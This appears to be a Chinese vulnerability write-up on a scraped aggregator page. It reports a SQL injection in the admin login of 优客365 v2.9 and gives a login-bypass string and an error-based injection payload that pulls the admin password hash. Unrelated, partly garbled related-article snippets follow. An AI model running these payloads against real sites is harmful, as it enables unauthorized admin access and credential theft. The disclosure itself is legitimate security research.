2. 程式人生 > >優客365 v2.9版本 後臺存在SQL註入

優客365 v2.9版本 後臺存在SQL註入

阿新 發佈:2017-11-12
-- src login php ima 分享 format cnblogs mod

安裝

技術分享

打開後臺登陸界面

http://localhost:9096/yk365/system/login.php

輸入單引號報錯

技術分享

得到表名

經過跟蹤後在\module\login.php文件出現錯誤

技術分享

代碼處理不嚴謹。根據上圖,經測試,用戶名可以用1‘ or ‘1‘=‘1進行繞過

但密碼經過md5加密

接下來通過SQL註入得到md5加密後的密碼

技術分享

payload: and (select 1 from(select count(*),concat(0x7e,(select user_pass from dir_users where user_id=1),0x7e,floor(rand(0)*2)) x from information_schema.columns group by x)a)--+

技術分享

用sqlmap跑的時候跑不出

可以利用此方法在不知道用戶名的情況下登陸進後臺

優客365 v2.9版本 後臺存在SQL註入

相關推薦

365 v2.9版本 後臺存在SQL

-- src login php ima 分享 format cnblogs mod 安裝 打開後臺登陸界面 http://localhost:9096/yk365/system/login.php 輸入單引號報錯 得到表名 經過跟蹤後在\modul

RDIFramework.NET ━ .NET快速資訊化系統開發框架鉅獻 V2.9 版本震撼釋出

RDIFramework.NET ━ .NET快速資訊化系統開發框架鉅獻 V2.9 版本震撼釋出   全新體驗、全新感覺、2015鉅獻!       繼上個版本“RDIFramework.NET V2.8版本釋出”5個多月的時間,V2.9版本面世了,感謝各位的支援。欲瞭解2.8版本新增與更新的內容可以檢

RDIFramework.NET V2.9版本 WinFom部分新增與修正的功能

RDIFramework.NET  V2.9版本 WinFom部分新增與修正的功能   轉眼間RDIFramework.NET框架走了快6個年頭了,隨著一個版本一個版本的升級改造,現在已經越來越完美了。使用的客戶也越來越多,經受住了大量實戰專案的考驗!   RDIFramework.NET V2.9 Wi

ourphp 最新版(v1.7.3) 後臺sql

http dmi client app conf agen 9.png 系統 sql語句 version:<?php /*************************************************************************

【安全牛學習筆記】?KALI版本更新和手動漏洞挖掘(SQL

信息安全 security+ sql註入 漏洞 KALI版本更新-----第一個ROLLING RELEASEKali 2.0發布時聲稱將采用rolling release模式更新(但並未實施)Fixed-release 固定發布周期 使用軟件穩定的主流版本 發布--

06 數據庫入門學習-視圖、sql、事務、儲過程

保存 sele .... tool 幻讀 登錄驗證 防sql註入 存儲 並發 一、視圖 1.什麽是視圖   視圖本質是一張虛擬的表 2.為什麽要用   為了原表的安全  只要有兩大功能    1.隱藏部分數據,開放指定數據    2.視圖可以將查詢結果保存,減少sq

cacti後臺SQL漏洞 --解決

templates abi agent ted 外部 eat kit Language view cacti後臺SQL註入漏洞 簡介 cacti後臺SQL註入漏洞 cacti /graphs_new.php中對$_POST["cg_g"]參數過濾不

Centos X64 6.9版本安裝postfix2.6.6+dovecot+openwebmail

"dovecot+openwebmail" "postfix 2.6安裝" "centos 6.9安裝postfix2.6.6" Centos X64 6.9版本安裝postfix2.6.6+dovecot+openwebmail測試完成

Centos6.9版本如何完成目錄遷移

centos 目錄遷移 相信在我們的生產中時常遇到某個目錄的數據量比較大,需要把它從一個磁盤遷移到另一個磁盤的情況,哪這個任務如何完成呢?下面我們就來做個小實驗手把手的教你(註:遷移到另一個磁盤它應該是一個獨立分區喲)1、先查看一下自己的磁盤情況,再創建一個分區,根據你的需要給它分配空間。2、

如何對金笛群發機器人8.9版本的界面進行設置

驅動 監測 串口 滿足 屬性 bsp 就會 ima 串口驅動 短信群發機器人8.8版本和8.9版本是標配的發短信軟件,只要購買短信貓就會送這兩個版本的軟件,雖然是免費版的,能滿足短信量少的需求。以下是8.9版本界面配置方法。 第一步:打開短信群發機器人8.9版本,在8.9版

MySQL 5.7.9版本sql_mode=only_full_group_by問題

nal light com -- mode query group by gin serve MySQL 5.7版本sql_mode=only_full_group_by問題 1、在MySQL環境下執行分組sql,如下 mysql> select db_server

如何查找Fiori UI上某個字段對應的後臺儲表的名稱

chrome 功能 如果 ood mode material mar print 系統 今天微信群裏有朋友問到這個問題。 如果是SAPGUI裏的事務碼,比如MM01,對於開發者來說這個任務非常容易完成。 比如我想知道下圖“Sales Unit”這個字段的值到底保存在哪張表的

MySQL數據庫學習【補充】MySQL 5.7.9版本sql_mode=only_full_group_by問題

bsp lock sql alt glob 當前 log cti src 用到GROUP BY 語句查詢時com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Expression #2 of SELECT

【Spark篇】---Spark調之代碼調,數據本地化調,內調,SparkShuffle調,Executor的堆外內調

左右 任務調度 combiner flight 觸發 年齡 ans minor 序列化機制 一、前述 Spark中調優大致分為以下幾種 ,代碼調優,數據本地化,內存調優,SparkShuffle調優,調節Executor的堆外內存。 二、具體 1、代碼調優 1、避免創

SharePoint Online 、office 365缺少將站點另為模板選項

雲計算 Office 365 之前文章行給出在SharePoint 2010 、SharePoint 2013 中將站點保存模板選項的文章。其實同樣的問題出現在Microsoft Office 365的一部分SharePoint Online中,所以在這篇文章做一下分享。我們註意到SharePoint

【從0開始Tornado建站】0.9版本號python站點代碼開源--持續更新中

分享 body clas .com tis https -m SM 。。 ? ? ? ? 從5月份開始【從0開始Tornado建站】這個專欄,開始一點一點把這個分類

jQuery1.9+版本的.on使用方法筆記

jQuery在jQuery1.7以前,異步加載的內容如果有click事件,都是使用.live方法。jQuery升級到1.9以後,本方法不再適用,改為.on方法。.on方法可以接受3個參數:事件名,觸發選擇器,事件函數。舉例說明:某html文檔中有一個id為parent的div,在這個div內再添加一個id為s

postgresql9.3.9版本部署

postgresql 9.3.9部署 安裝方式:源碼包安裝安裝環境:linux—Centos 6.5 下載Postgresql源碼包wget http://ftp.postgresql.org/pub/source/v9.3.9/postgresql-9.3.9.tar.bz2#地址可更改,需要其他

【Postgresql】postgresql9.3.9版本基於流復制方式雙機熱備方案

postgresql 雙機熱備 流復制 9.3.9 系統環境:centos6.5數據庫版本: postgres9.3.9虛擬機2臺:Master:10.0.2.160Slave:10.0.2.69數據存儲位置:/usr/local/pgsql/data/ 安裝pgsql數據庫 安裝過程可參

js前臺頁面顯示中文,後臺對應的value值實現

Matter 類型 top highlight wid red score sortable form field: ‘rightType‘, title: ‘權益類型‘,